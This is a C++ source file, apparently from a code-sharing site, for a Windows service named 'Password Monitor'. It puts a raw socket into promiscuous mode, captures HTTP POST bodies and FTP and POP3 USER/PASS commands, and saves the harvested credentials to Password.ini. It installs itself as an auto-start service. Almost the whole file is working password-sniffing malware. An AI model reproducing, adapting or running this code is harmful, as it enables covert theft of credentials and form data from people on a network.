📄 monitorservice.cpp
字号:
// monitorservice.cpp : 定义控制台应用程序的入口点。
//
//Author: Anish C.V.
//EMail : cv_anish@hotmail.com
#include "stdafx.h"
#include <Winsock2.h>
#include "Windows.h"
#include "Winsvc.h"
#include "mstcpip.h"
#include "ws2tcpip.h"
#pragma comment(lib,"Advapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
typedef struct tagBuff {
DWORD dwFlag;
DWORD SrcIP;
DWORD DstIP;
DWORD dwLen;
BYTE cBuffer[1024];
}BUFF,*PBUFF;
#define BUFFER_MAX 1024
BUFF Buffer[BUFFER_MAX];
#define BUFFER_SIZE 65536
char RecvBuf [BUFFER_SIZE];
typedef enum tagFlag{
HTTP,
FTP,
SMTP,
POP3
}FLAG;
static HANDLE g_hSemaphore=NULL;
static HANDLE g_hThread=NULL;
static int nHeader=0;
static int nTailer=0;
//
// Ip header
//
typedef struct _IP_HEADER
{
union
{
BYTE VersionAndHeaderLength; // Version 4 bit, Header Length 4 bit * 4
struct
{
BYTE HeaderLength : 4;
BYTE Version : 4;
};
};
BYTE TypeOfService;
WORD DatagramLength;
WORD Id;
WORD FlagsAndFragmentOffset; // Flags 3 bit, Fragment Offset 13 bit
BYTE TimeToLive;
BYTE Protocol;
WORD CheckSum;
BYTE SourceIp[4];
BYTE DestinationIp[4];
} IP_HEADER, *PIP_HEADER;
#define IP_HEADER_LENGTH 20
#define PROTOCOL_INVALID_IP 0xFF
#define PROTOCOL_INVALID_TCP 0xFE
#define PROTOCOL_INVALID_UDP 0xFD
#define PROTOCOL_INVALID_ICMP 0xFC
#define PROTOCOL_TCP 0x06
#define PROTOCOL_UDP 0x11
#define PROTOCOL_ICMP 0x01
#define PROTOCOL_IGMP 0x02
#define HEADER_LENGTH_MULTIPLE 4
#define GET_IP_VERSION(verlen) ((verlen & 0xF0) >> 4)
#define GET_IP_HEADER_LENGTH(verlen) ((verlen & 0x0F) * HEADER_LENGTH_MULTIPLE)
#define GET_IP_FLAGS(ffo) ((ffo & 0xE000) >> 13)
#define GET_IP_FRAGMENT_OFFSET(ffo) (ffo & 0x1FFF)
//
// Tcp Header
//
typedef struct _TCP_HEADER
{
WORD SourcePort;
WORD DestinationPort;
DWORD SeqNumber;
DWORD AckNumber;
union
{
WORD LenAndCodeBits; // Header length 4 bit, Reserved 6 bit, Code Bits 6 bit
struct
{
WORD Reserved1 : 8;
WORD TcpCode : 6;
WORD Reserved2 : 2;
};
struct
{
WORD Reserved3 : 4;
WORD HeaderLength : 4;
WORD TcpFin : 1;
WORD TcpSyn : 1;
WORD TcpRst : 1;
WORD TcpPsh : 1;
WORD TcpAck : 1;
WORD TcpUrg : 1;
WORD Reserved4 : 2;
};
};
WORD Window;
WORD CheckSum;
WORD UrgentPointer;
} TCP_HEADER, *PTCP_HEADER;
#define TCP_HEADER_LENGTH 20
#define GET_TCP_HEADER_LENGTH(lcb) (((lcb & 0xF000) >> 12) * HEADER_LENGTH_MULTIPLE)
#define GET_TCP_CODE_BITS(lcb) (lcb & 0x003F)
//
// Udp Header
//
typedef struct _UDP_HEADER
{
WORD SourcePort;
WORD DestinationPort;
WORD Length; // including this header
WORD CheckSum;
} UDP_HEADER, *PUDP_HEADER;
#define UDP_HEADER_LENGTH 8
//
// Icmp Header
//
typedef struct _ICMP_HEADER
{
BYTE Type;
BYTE Code; // type sub code
WORD CheckSum;
WORD ID;
WORD Seq;
} ICMP_HEADER, *PICMP_HEADER;
#define ICMP_HEADER_LENGTH 8
#define ICMP_NORMAL 0
#define ICMP_REQUEST 1
#define ICMP_RESPONSE 2
SERVICE_STATUS m_ServiceStatus;
SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
BOOL bRunning=true;
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);
void WINAPI ServiceCtrlHandler(DWORD Opcode);
BOOL InstallService();
BOOL DeleteService();
void CheckUdp(PUDP_HEADER pUdpHeader,DWORD dwLen)
{
}
void CheckTcp(PTCP_HEADER pTcpHeader,DWORD dwLen)
{
if (pTcpHeader->TcpFin || pTcpHeader->TcpRst||pTcpHeader->TcpSyn)
{
return;
}
TCHAR* szTemp=NULL;
switch(ntohs(pTcpHeader->DestinationPort))
{
case 80:
case 8080:
szTemp=(char*)pTcpHeader+sizeof(TCP_HEADER);
if (strstr(szTemp,"POST")&&strstr(szTemp,"HTTP/1")){
Buffer[nTailer].dwFlag=HTTP;
Buffer[nTailer].dwLen=dwLen;
memcpy(Buffer[nTailer].cBuffer,szTemp,dwLen);
nTailer=(nTailer+1) % BUFFER_MAX;
ReleaseSemaphore( g_hSemaphore, // handle to semaphore
1, // increase count by one
NULL);
}
break;
case 110:
szTemp=(char*)pTcpHeader+sizeof(TCP_HEADER);
if (strstr(szTemp,"USER")||strstr(szTemp,"PASS")){
PIP_HEADER pIpHeader=(PIP_HEADER)((BYTE*)pTcpHeader-sizeof(IP_HEADER));
Buffer[nTailer].SrcIP=*((int*)pIpHeader->SourceIp);
Buffer[nTailer].DstIP=*((int*)pIpHeader->DestinationIp);;
Buffer[nTailer].dwFlag=POP3;
Buffer[nTailer].dwLen=dwLen;
memcpy(Buffer[nTailer].cBuffer,szTemp,dwLen);
nTailer=(nTailer+1) % BUFFER_MAX;
ReleaseSemaphore(
g_hSemaphore, // handle to semaphore
1, // increase count by one
NULL);
}
break;
case 21:
szTemp=(char*)pTcpHeader+sizeof(TCP_HEADER);
if (strstr(szTemp,"USER")||strstr(szTemp,"PASS")){
PIP_HEADER pIpHeader=(PIP_HEADER)((BYTE*)pTcpHeader-sizeof(IP_HEADER));
Buffer[nTailer].SrcIP=*((int*)pIpHeader->SourceIp);
Buffer[nTailer].DstIP=*((int*)pIpHeader->DestinationIp);;
Buffer[nTailer].dwFlag=FTP;
Buffer[nTailer].dwLen=dwLen;
memcpy(Buffer[nTailer].cBuffer,szTemp,dwLen);
nTailer=(nTailer+1) % BUFFER_MAX;
ReleaseSemaphore(
g_hSemaphore, // handle to semaphore
1, // increase count by one
NULL);
}
break;;
default:
break;
}
}
void DecodeEthPkt_data( u_char * pkt)
{
WORD EthernetFrameType;
WORD LengthCount;
PIP_HEADER pIpHeader;
pIpHeader = (PIP_HEADER)(pkt/*+sizeof(EHTERNET_FRAME)*/);
LengthCount = pIpHeader->HeaderLength * HEADER_LENGTH_MULTIPLE;
if(LengthCount == 0){
//dprintf(("LengthCount == 0"));
return ;
}
switch(pIpHeader->Protocol)
{
case PROTOCOL_TCP:
// 解析Tcp Header
CheckTcp((PTCP_HEADER)(pkt+/*sizeof(EHTERNET_FRAME)+*/sizeof(IP_HEADER)),pIpHeader->DatagramLength-sizeof(TCP_HEADER));
return ;
case PROTOCOL_UDP:
// 解析 Udp Header
CheckUdp((PUDP_HEADER)(pkt+/*sizeof(EHTERNET_FRAME)+*/sizeof(IP_HEADER)),pIpHeader->DatagramLength-sizeof(TCP_HEADER));
return ;
default:
break;
}
return;
}//DecodeEthPkt_data
DWORD ThreadProc(LPVOID lParam)
{
DWORD dwWaitResult;
while (TRUE) {
dwWaitResult = WaitForSingleObject(
g_hSemaphore, // handle to semaphore
2);
switch (dwWaitResult)
{
//队列中还有空位置
case WAIT_OBJECT_0:
switch(Buffer[nHeader].dwFlag){
case HTTP:
{
TCHAR* szURL=strstr((char*)Buffer[nHeader].cBuffer,"POST ")+5;
if ((int)szURL==0005) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR* szHTTP=strstr(szURL,"HTTP/");
if (szHTTP==NULL) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR cURL[1024];
ZeroMemory(cURL,sizeof cURL);
_tcsncpy(cURL,szURL,szHTTP-szURL);
TCHAR* szHost=strstr((char*)Buffer[nHeader].cBuffer,"Host: ")+6;
if ((int)szHost==0006) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR* szCRLN=strstr(szHost,"\r\n");
if (szCRLN==NULL) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR cHost[1024];
ZeroMemory(cHost,sizeof cHost);
_tcsncpy(cHost,szHost,szCRLN-szHost);
_tcscat(cHost,cURL);
TCHAR* szPostData=strstr((char*)Buffer[nHeader].cBuffer,"\r\n\r\n")+4;
TCHAR* szContentLen=strstr((char*)Buffer[nHeader].cBuffer,"Content-Length: ")+16;
if((int)szPostData==4||(int)szContentLen==16){
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR* szRefer=strstr((char*)Buffer[nHeader].cBuffer,"Referer: ")+9;
TCHAR cRefer[1024];
if((int)szRefer!=9){
ZeroMemory(cRefer,sizeof cRefer);
int i=0;
while(szRefer[i]!='\r'){
cRefer[i]=szRefer[i];
i++;
}
}
else
_tcscpy(cRefer,"HTTP");
int nLen;
sscanf(szContentLen,"%d",&nLen);
szPostData[nLen]=0;
WritePrivateProfileString(cHost,szPostData,cRefer,"Password.ini");
nHeader=(nHeader+1)%BUFFER_MAX;
}
break;
case FTP:
{
TCHAR* szCRLN=strstr((char*)Buffer[nHeader].cBuffer,"\r\n");
if (szCRLN!=NULL) {
*szCRLN=0;
}
WritePrivateProfileString(inet_ntoa(*(struct in_addr *)&Buffer[nHeader].DstIP),
(char*)Buffer[nHeader].cBuffer,"FTP","Password.ini");
nHeader=(nHeader+1)%BUFFER_MAX;
}
break;
case SMTP:
break;
case POP3:
TCHAR* szCRLN=strstr((char*)Buffer[nHeader].cBuffer,"\r\n");
if (szCRLN!=NULL) {
*szCRLN=0;
}
WritePrivateProfileString(inet_ntoa(*(struct in_addr *)&Buffer[nHeader].DstIP),
(char*)Buffer[nHeader].cBuffer,"POP3","Password.ini");
nHeader=(nHeader+1)%BUFFER_MAX;
break;
}
break;
//队列中无空位置,超时退出
case WAIT_TIMEOUT:
break;
}
}
return TRUE;
}
int main(int argc, char* argv[])
{
if(argc>1)
{
if(strcmp(argv[1],"-i")==0)
{
if(InstallService())
printf("\n\nService Installed Sucessfully\n");
else
printf("\n\nError Installing Service\n");
}
if(strcmp(argv[1],"-d")==0)
{
if(DeleteService())
printf("\n\nService UnInstalled Sucessfully\n");
else
printf("\n\nError UnInstalling Service\n");
}
else
{
printf("\n\nUnknown Switch Usage\n\nFor Install use MonitorService -i\n\nFor UnInstall use MonitorService -d\n");
}
}
else
{
SERVICE_TABLE_ENTRY DispatchTable[]={{"Password Monitor",ServiceMain},{NULL,NULL}};
StartServiceCtrlDispatcher(DispatchTable);
}
return 0;
}
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
DWORD status;
DWORD specificError;
m_ServiceStatus.dwServiceType = SERVICE_WIN32;
m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwServiceSpecificExitCode = 0;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
m_ServiceStatusHandle = RegisterServiceCtrlHandler("Password Monitor",ServiceCtrlHandler);
if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus)) return;
g_hSemaphore = CreateSemaphore(
NULL, // no security attributes
0, // initial count
BUFFER_MAX, // maximum count
NULL); // unnamed semaphore
DWORD dwThread;
if (g_hThread==0) {
g_hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc,NULL,0,&dwThread);
}
WSADATA WSAData;
BOOL flag = true;
int nTimeout = 1000;
char LocalName[16];
SOCKADDR_IN addr_in;
struct hostent *pHost;
SOCKET sock;
// 检查 Winsock 版本号
if (WSAStartup(MAKEWORD(2, 2), &WSAData) != 0)return ;
// 初始化 Raw Socket
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == INVALID_SOCKET) return ;
// 设置IP头操作选项
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag)) == SOCKET_ERROR)
return ;
// 获取本机名
if (gethostname((char*)LocalName, sizeof(LocalName)) == SOCKET_ERROR)return ;
// 获取本地 IP 地址
if ((pHost = gethostbyname((char*)LocalName)) == NULL) return ;
addr_in.sin_addr = *(in_addr *)pHost->h_addr_list[0]; //IP
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(55555);
// 把 sock 绑定到本地地址上
if (bind(sock, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)return ;
DWORD dwValue = 1;
// 设置 SOCK_RAW 为SIO_RCVALL,以便接收所有的IP包
if (ioctlsocket(sock, SIO_RCVALL, &dwValue) != 0) return ;
while (true)
{
int ret = recv(sock, RecvBuf, BUFFER_SIZE, 0);
if (ret > 0)
{
DecodeEthPkt_data((BYTE*)RecvBuf) ;
}
}
return;
}
void WINAPI ServiceCtrlHandler(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
bRunning=false;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
return;
}
BOOL InstallService()
{
char strDir[1024];
SC_HANDLE schSCManager,schService;
GetModuleFileName(NULL,strDir,sizeof strDir);
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL) return false;
LPCTSTR lpszBinaryPathName=strDir;
schService = CreateService(schSCManager,"Password Monitor","Password Monitor", // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_OWN_PROCESS, // service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
lpszBinaryPathName, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL) return false;
CloseServiceHandle(schService);
return true;
}
BOOL DeleteService()
{
SC_HANDLE schSCManager;
SC_HANDLE hService;
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL) return false;
hService=OpenService(schSCManager,"Password Monitor",SERVICE_ALL_ACCESS);
if (hService == NULL) return false;
if(DeleteService(hService)==0) return false;
if(CloseServiceHandle(hService)==0)
return false;
else
return true;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -